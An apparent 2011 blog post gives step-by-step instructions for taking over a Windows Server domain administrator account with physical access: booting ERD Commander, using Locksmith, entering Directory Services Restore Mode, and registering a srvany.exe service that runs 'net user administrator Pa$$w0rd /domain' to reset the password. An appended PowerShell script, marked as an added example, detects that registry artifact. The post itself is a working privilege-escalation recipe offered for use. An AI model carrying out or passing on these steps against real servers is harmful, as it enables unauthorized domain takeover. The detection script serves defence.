Friday, April 8, 2011

How to get domain administrator privileges in Windows Server 2003 / 2008

What we need:
  1. Physical access to the server
  2. ERD Commander CD (or another CD with the Locksmith utility)
  3. Head + Hands
Your actions:
  1. Insert CD and boot from ERD Commander
  2. Use Locksmith to get local administrator privileges
  3. Reboot
  4. Boot Windows Server in Directory Services Restore Mode
  5. Login with your local admin username and password
  6. Put cmd.exe, srvany.exe and instsrv.exe in C:\tools (or some other directory)
  7. Run cmd.exe
  8. cd C:\tools
  9. instsrv PassRecovery C:\tools\srvany.exe
  10. Set the PassRecovery service to start automatically (in the Settings panel, or by running services.msc)
  11. Run regedit
  12. Create the subkey Parameters under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PassRecovery
  13. Add two string values: Application (C:\tools\cmd.exe) and AppParameters (/k net user administrator Pa$$w0rd /domain), where administrator is the name of the domain administrator and Pa$$w0rd is the new password, which must comply with the security policy
  14. Example: /k net user admin Pa$$w0rd /domain
  15. In the service settings, on the Log On tab, enable the checkbox "Allow service to interact with desktop" and apply.
  16. Reboot
  17. Run
  18. Enjoy.
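
From the defender's side, the steps above leave a recognizable artifact in the registry: a service whose image is srvany.exe and whose Parameters key starts cmd.exe with a net user ... /domain command line. The PowerShell below is an added example, not part of the original post, that looks for that pattern; the helper name Test-SrvanyWrapper and the sample values are constructed here, and it assumes it is run elevated on the server being checked.

```powershell
# Added example: find services wrapped by srvany.exe that start a shell
# or carry an account-changing command line (the artifact left by the steps above).
$servicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Hypothetical helper name; returns the list of reasons a service looks suspicious.
function Test-SrvanyWrapper {
    param([string]$ImagePath, [string]$Application, [string]$AppParameters, [int]$Type)
    $reasons = @()
    if ($ImagePath -notmatch 'srvany\.exe') { return $reasons }
    if ($Application -match '\\(cmd|powershell)\.exe"?\s*$') {
        $reasons += 'srvany.exe launches a command interpreter'
    }
    if ($AppParameters -match '\bnet1?(\.exe)?\s+user\b') {
        $reasons += 'AppParameters contains a "net user" command'
    }
    if ($AppParameters -match '/domain\b') {
        $reasons += 'command is directed at the domain (/domain)'
    }
    # 0x100 = SERVICE_INTERACTIVE_PROCESS ("Allow service to interact with desktop")
    if ($reasons.Count -gt 0 -and ($Type -band 0x100)) {
        $reasons += 'service is allowed to interact with the desktop'
    }
    return $reasons
}

# Self-check on constructed values that mirror the example in the steps above.
# Type 272 = 0x110 (own process + interactive).
$sample = @(Test-SrvanyWrapper -ImagePath 'C:\tools\srvany.exe' `
    -Application 'C:\tools\cmd.exe' `
    -AppParameters '/k net user admin Pa$$w0rd /domain' -Type 272)
if ($sample.Count -ne 4) { throw 'self-check failed: sample should raise 4 reasons' }

# Scan the live registry (run elevated).
Get-ChildItem -Path $servicesRoot -ErrorAction SilentlyContinue | ForEach-Object {
    $svc    = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
    $params = Get-ItemProperty -Path "$($_.PSPath)\Parameters" -ErrorAction SilentlyContinue
    $reasons = @(Test-SrvanyWrapper -ImagePath $svc.ImagePath -Application $params.Application `
        -AppParameters $params.AppParameters -Type ([int]$svc.Type))
    if ($reasons.Count -gt 0) {
        [pscustomobject]@{
            Service       = $_.PSChildName
            ImagePath     = $svc.ImagePath
            Application   = $params.Application
            AppParameters = $params.AppParameters   # may hold a cleartext password
            StartType     = $svc.Start              # 2 = automatic
            Reasons       = $reasons -join '; '
        }
    }
}
```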
